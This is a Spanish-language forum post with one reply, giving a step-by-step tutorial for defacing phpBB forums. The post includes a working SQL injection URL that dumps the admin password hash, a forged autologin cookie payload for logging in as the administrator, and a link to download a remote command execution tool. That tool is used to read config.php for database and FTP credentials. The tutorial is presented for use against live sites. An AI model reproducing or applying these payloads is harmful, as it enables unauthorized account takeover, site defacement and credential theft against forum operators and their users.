StarGames
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

Deface a phpBB por cookies

2 participantes

Ir abajo

Deface a phpBB por cookies Empty Deface a phpBB por cookies

Mensaje  danywar1995 Mar Dic 09, 2008 12:32 am

---------------------------------------------------------------------------------------------------
******
phpBB|| RECOPILACION DE LA WEB: by danywar1995
******

Logeate en el foro (antes registrate xD), y activa la opcion de "Entrar automaticamnte con ese login"

Si tenes Mozilla FireFox (si no bajatelo, MUCHA mejor k el ie):

PASOS: 1) Anda a C:\documents and settings\TU_USER\Datos de programa\Mozilla\Firefox\Profiles\EL_K_AYA.default

2) Abri el cookies.txt con el NotePad u otro

3) Pone Edicion--->buscar: la_web_k_t_loeaste.algo

4) Anda hacia la derecha hasta k diga phpbb2mysql_data (la mayoria de veces es asi)

5) Vas a ver algo parecido a esto: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22690db5e32bfd5f28319895c38de9f546%22%3Bs%3A6%3A%22userid%22%3Bi%3A2%3B%7D

6) Esta encriptado asi k anda a: http://usuarios.lycos.es/zonahackphyro/modules.php?name=PHP-Nuke_Tools&file=index&func=URLENCODER
y pega el coso k es parecido al de arriba (borra el http:// del cuadro antes) y pone Decode

7) va a kdar +/- asi: a:2:{s:11:"autologinid";s:32:"690db5e32bfd5f28319895c38de9f546";s:6:"userid";s:1:2;}
| | |
|--->hash del pass deladmin | |
| |
Este numero corresponde a la cantidad de cifras señaladas con **SEÑAL**<------| |
|
|
**SEÑAL**
Este numero es el User_ID

8) Para sacar el hash: www.web.xxx/donde_esta_el_foro/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*


Hay varias formas mas

Podes probar con Remote Command Execution (bug k te permite ejecutar comandos en el server) o O pones como la cookie: a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"4";}
|
ACA ponel el UserID del
admin

Para saberlo: Pone "Members list" y luego pone click en el primero, tiene k decir "Site Admin"
en el Profile, luego si dice eso, fijate en la url: http://www.algo.algo/foro/......viewprofile&u=4
y ponel numero (en este caso 4) en la "formula" de arriba y encriptala con URL.



Para k practiquen hice un foro (no sean lammers y lo desctiven y/o cambien las claves)
Ya q si no otros no van a poder aprender:

Una vez k entren pongan un mensaje en el unico Board k hay k diga: "H0l4, soy tu_nombre y entre al foro como admin"

r3t0.tk o r3to.tk o ret0.tk

el mensaje ponanlo en el Board: Board


-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

bajense de: thor.prohosting.com/emo8276/varios/phpBB.exe el perograma k es para "Remote Comand Execution"

Pongan en URL: la web con el foro (www.web.xxx/donde:este_el_foro)
En topic: algun tema k exista (fiense en la direccion del explorer diga www.web.xxx/donde_este_el_foro/viewtopic.php?t=1254 (en este caso es: 1254)
en comando: cualkier comando DE a 1 solo UNIX: mas conocido es ----> tail config.php (esto nos dira, si es vulnerable, el user y pass de la Base de Datos k en algunos casos es igual al de FTP (pongan ftp://user:pass@www.web.xxx))


Bueno espero k les sirva



bye
</NOSCRIPT></TITLE><SCRIPT LANGUAGE="JavaScript">
<!--Ad Banner
function popupPage() {
var windowopts = "location=no,scrollbars=no,menubars=no,toolbars=no,resizable=yes,left= 50,top=50,width=490,height=130";

popup21148 = open('/prohost/banner.html',"MenuPopup",windowopts);
popup21148.focus();
}

popupPage();

// Ad Banner-->
</script>

danywar1995
Usuario Nvl. 1
Usuario Nvl. 1

Cantidad de envíos : 13
Barra de Conexión : Deface a phpBB por cookies 2lm5ke8
Fecha de inscripción : 09/12/2008

Volver arriba Ir abajo

Deface a phpBB por cookies Empty Re: Deface a phpBB por cookies

Mensaje  nidip Jue Ene 01, 2009 8:41 pm

BUEN APORTE PERO EN LA ESKINA DE ABAJO DE LA DERECHA TENES ALGO PARA SUPRIMIR KOOKKIES

nidip
Usuario Nvl. 6
Usuario Nvl. 6

Masculino Cantidad de envíos : 82
Edad : 34
Fecha de inscripción : 01/01/2009

Volver arriba Ir abajo

Volver arriba

- Temas similares

 
Permisos de este foro:
No puedes responder a temas en este foro.